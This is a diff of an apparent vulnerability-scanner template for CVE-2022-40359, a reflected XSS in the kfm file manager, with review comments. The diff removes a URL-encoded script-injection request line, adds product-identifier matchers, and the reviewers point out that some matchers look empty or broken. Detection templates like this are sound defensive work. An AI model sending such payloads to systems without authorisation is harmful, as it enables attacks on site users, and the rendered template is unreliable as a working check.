diff --git a/cves/2022/CVE-2022-40359.yaml b/cves/2022/CVE-2022-40359.yaml
index 9ec17e0b99..d567a66ccf 100644
--- a/cves/2022/CVE-2022-40359.yaml
+++ b/cves/2022/CVE-2022-40359.yaml
@@ -1,8 +1,8 @@
 id: CVE-2022-40359
 info:
- name: kfm 1.4.7 - Cross Site Scripting
- author: edoardottt
+ name: kfm <= 1.4.7 - Reflected Cross-Site Scripting
+ author: edoardottt,daffainfo
 severity: medium
 description: |
 Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php.
@@ -17,7 +17,7 @@ requests:
 - raw:
 - |
 @timeout: 10s
- GET /kfm/index.php/'%3Cscript%3Ealert(document.domain);%3C/script%3E HTTP/1.1
+ GET /kfm/index.php/' HTTP/1.1
 Host: {{Hostname}}
 matchers-condition: and
@@ -34,4 +34,7 @@ requests:
 - type: word
 part: body
 words:
- - ""
\ No newline at end of file
+ - ""
+ - "x_kfm_changeCaption"
+ - "kfm_copyFiles"
+ condition: and
\ No newline at end of file
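Review bot: The rewritten request line `GET /kfm/index.php/' HTTP/1.1` now sends only a bare quote, so the template no longer demonstrates that anything is executed and the verdict rests entirely on the body matchers, none of which (as far as this hunk and the later matcher hunk show) check that the quote comes back unescaped in the response. A word matcher on the fragment of the page where the extra path segment is echoed would turn this back into a reflection check rather than a product fingerprint; at minimum the `description` in the first hunk, which still says "via crafted GET request", should say what the probe actually sends and what is matched. The enclosing `raw` request starts before this hunk and its matchers are defined after it, so the full matcher set is not visible here.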
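Review bot: The first entry of the rewritten `words` list renders here as `""`; if that is literally an empty string it is a substring of every body and contributes nothing under the added `condition: and`, leaving the match to `x_kfm_changeCaption` and `kfm_copyFiles`, which look like kfm UI identifiers that would appear on any kfm page rather than evidence of the reflection. If it is instead an HTML tag that the rendering stripped, it needs re-checking against the new single-quote request in the previous hunk, which no longer injects a tag. `condition: and` must sit at the matcher level beside `words:`, not as a list item inside it; whitespace is lost in this view, so confirm the indentation. The `\ No newline at end of file` marker survives on the new side; end the file with a single newline.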